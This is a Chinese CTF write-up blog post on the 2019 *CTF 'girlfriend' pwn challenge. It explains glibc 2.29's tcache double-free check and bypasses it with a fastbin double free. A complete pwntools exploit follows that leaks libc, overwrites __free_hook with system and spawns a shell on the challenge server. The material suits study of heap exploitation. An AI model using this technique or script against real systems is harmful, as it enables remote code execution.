pollux's Dairy

2019-sixstarsCTF-girlfriend[libc2.29,tcache]

tcache libc2.29
字数统计: 1.4k阅读时长: 8 min
2019/05/02 Share

tcache在libc2.26时引入,加快了堆的内存分配。我们先回顾一下2.29之前libc对tcache的管理

0x00 tcache对堆的管理(libc<2.29)

在64位下,所有小于0x410(大小包括chunk head)的chunk被释放后,都会加入tcache链表中,一共有64个tcache链表

idx size
0 0x20
63 0x410

当tcache链表中满足申请内存大小时,会先从tcache中分配。

在tcache中有两个结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* tcache总体结构体,包含两个数组
字符数组counts,保存着每个链表counts[0]-counts[63]中的chunk个数
结构体数组entries,保存每个链表的头结点chunk的地址
*/
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

使用这两个结构体的又两个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*释放一定大小chunk时,tcache未满,调用tcache_put
*/
static void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/*申请一定chunk时,tcache不为空,调用tcache_get
*/
static void *tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

可以看到两个函数没有任何安全监测,比如调用tcache_put时,可以轻易实现double free,如下所示。

1
Tcachebins[idx=0, size=0x10] count=2  ←  Chunk(addr=0x55e7ae650280, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x55e7ae650280, size=0x20, flags=PREV_INUSE)  →  [loop detected]

0x01 tcache对堆的管理(libc = 2.29)

2.29的libc对tcache加了一些安全检测机制,下面看改动内容

tcache_entry结构体的改动

1
2
3
4
5
6
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

可以看到加入了结构体指针key来防止double free

下面看下怎么使用key检测double free

1
2
3
4
5
6
7
8
9
10
11
static void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

当chunk被放入tcache时,会对key赋值为当前chunk的地址,根据提示在_int_free中找到对应源码

1
2
3
4
5
6
7
8
9
10
11
12
if (__glibc_unlikely (e->key == tcache))
  {
    tcache_entry *tmp;
    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
    for (tmp = tcache->entries[tc_idx];
         tmp;
         tmp = tmp->next)
      if (tmp == e)
        malloc_printerr ("free(): double free detected in tcache 2");
    /* If we get here, it was a coincidence.  We've wasted a
       few cycles, but don't abort.  */
  }

如果e->key == tcache,程序会从链表头检索chunk,如果检索到了chunk e,说明tcache中已经存在chunk e,再次释放就会触发double free。

0x02 程序分析

1
2
3
4
5
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

保护全开

1
2
3
4
5
6
7
8
9
10
Do you wanna a girl friend?
Maybe she is hidden in the heap!
======================
1.Add a girl's info
2.Show info
3.Edit info
4.Call that girl!
5.Exit lonely.
======================
Input your choice:

3.Edit info 功能为空

4.Call that girl! 释放堆,但是未清空指针

0x03 绕过double free检测

虽然tcache加入了double free的检测,但是fastbin没有

所以可以先将一定大小的tcache填满(这个0x20是不包含chunk head的大小)

1
Tcachebins[idx=1, size=0x20] count=7

再释放0x30的chunk就会放入fastbin中

1
Fastbins[idx=1, size=0x20]  ←  Chunk(addr=0x55f8e0d129e0, size=0x30, flags=PREV_INUSE)  ←  Chunk(addr=0x55f8e0d12a30, size=0x30, flags=PREV_INUSE)  ←  Chunk(addr=0x55f8e0d129e0, size=0x30, flags=PREV_INUSE)  →  [loop detected]

根据tcache的机制,再次申请0x30的chunk,会先从tcache中分配,比如我们申请7次,清空0x30的tcache。

此时再申请0x30的chunk就会从fastbin中分配,然后会把剩余的fastbin按大小加入tcache,有点类似unsortedbin的分配

1
Tcachebins[idx=1, size=0x20] count=3  ←  Chunk(addr=0x5635b6ee1a30, size=0x30, flags=PREV_INUSE)  ←  Chunk(addr=0x5635b6ee19e0, size=0x30, flags=PREV_INUSE)  ←  Chunk(addr=0x7f7906b328c8, size=0x0, flags=)

可以看到最后一个chunk,已经是libc函数的地址了

这样就绕过了tcache的double free检测,实现任意地址分配堆了

0x04 EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python
from pwn import *

LOCAL = 0
if LOCAL:
    p = process(['./lib/ld-2.29.so','--library-path','./lib/','./chall'])
    #p = process('./chall')
else:
    p = remote('34.92.96.238',10001)
context.log_level = 'debug'

def add(size,name,call):
    p.recvuntil('Input your choice:')
    p.sendline(str(1))
    p.recvuntil('name')
    p.sendline(str(size))
    p.recvuntil('please inpute her name:')
    p.sendline(name)
    p.recvuntil('please input her call:')
    p.sendline(call)

def delete(idx):
    p.recvuntil('Input your choice:')
    p.sendline(str(4))
    p.recvuntil('Please input the index:')
    p.sendline(str(idx))
def show(idx):
    p.recvuntil('Input your choice:')
    p.sendline('2')
    p.recvuntil('Please input the index:')
    p.sendline(str(idx))

def q():
    gdb.attach(p)
    raw_input('test')

def pwn():
    add(1288,'aaaaaaa','2'*12)#0 0x508
    for i in range(7): #idx 1-7
        add(32,'bbbbbbbb','1'*12)

    add(32,'cccccccc','1'*12)#8
    add(32,'bbbbbbbb','1'*12)#9

    delete(0)#unsortedbin
    show(0)
    p.recvuntil('name:\x0a')
    leak_addr =  u64(p.recv(6).ljust(8,'\x00'))
    libc_base = leak_addr - 0x3B1C40 - 88 -8
    free_hook = libc_base + 0x3b38c8
    system = libc_base + 0x41c30
    log.success('libc_base: '+ hex(libc_base))
    log.success('free_hook: '+ hex(free_hook))
    log.success('system: '+ hex(system))

    delete(1)
    delete(2)
    delete(3)
    delete(4)
    delete(5)
    delete(6)
    delete(7)

    delete(8)#fastbin
    delete(9)#fastbin
    delete(8)#fastbin

    for i in range(7): #idx 1-7
        add(32,'bbbbbbbb','1'*12)

    add(32,p64(free_hook),'1'*12)
    add(32,'/bin/sh\x00','1'*12)
    add(32,'aaaaaaaa','1'*12)
    add(32,p64(system),'1'*12)
    delete(9)
    p.interactive()
pwn()

原文作者:Po1lux

原文链接:http://yoursite.com/2019/05/02/2019-sixstarsCTF-girlfriend/

发表日期:May 2nd 2019, 5:30:31 pm

更新日期:June 14th 2019, 8:32:02 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 0x00 tcache对堆的管理(libc<2.29)
  2. 2. 0x01 tcache对堆的管理(libc = 2.29)
  3. 3. 0x02 程序分析
  4. 4. 0x03 绕过double free检测
  5. 5. 0x04 EXP
Total : 56
2020
2019
2018
unlink fastbin attack House of spirit House of Force UAF DynELF PIE format string off by one x64 64bit 格式化字符串漏洞 栈溢出 Canary tcache libc-2.29 chunk overlapping chunk extend shellcode,系统调用 libc2.29 stack overflow fmt rop 2016,CTFs,fsb CTF stack pivoting OS pwnable fsb
heap stack android-reverse learning-note android-system Operating-System pwnable conclusion